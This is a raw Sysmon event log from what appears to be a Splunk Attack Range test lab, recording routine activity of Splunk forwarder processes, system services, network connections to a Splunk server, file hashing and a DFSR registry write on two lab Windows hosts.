10341000x80000000000000001051702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.300{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:50.278{466BC892-F63A-60EB-927D-00000000CF01}9916C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:41.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51115-false10.0.1.12-8000- 10341000x80000000000000001051725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.759{466BC892-F63B-60EB-947D-00000000CF01}97322216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C2A5C334D1EAB20CB3ED509F558610A,SHA256=7C38ABDF287437053760FFE223B73BDFEA7B87635795455C62CF15A9254FE2F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:50.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57349-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.521{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.508{466BC892-F63B-60EB-947D-00000000CF01}9732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4777CA860206E711B474441468C148CB,SHA256=72FB7D68192E8586F06B6D0C4D25DEB33C35E311D120517CE55B04E1793551A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:51.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3865EF0DD6CAA30B8C1856C252399156,SHA256=B65A7769734CA0F9C8BBF782D9D8E90905E093B21E6E15AF4FF739FD0046819E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.840{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.838{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.837{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.823{466BC892-F63C-60EB-967D-00000000CF01}9172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001051739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:52.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0D225AF76E9958789E75080063F2E23,SHA256=51BA9C7D5D751BB4185FDE269B9DBD7F51CCFA7D0606D9F656075CDAAFAF303F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808767Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:52.014{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=694139311A45B5DBBEAAD13DE7FE1C7B,SHA256=3F2CEBD5E76E90DA39B65DD644B90B1969C8A377383CEE83B90381E81D2E4265,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001051738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:58:52.559{466BC892-02BC-60E8-3000-00000000CF01}2160C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\DFD6B7A8-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_DFD6B7A8-0000-0000-0000-100000000000.XML 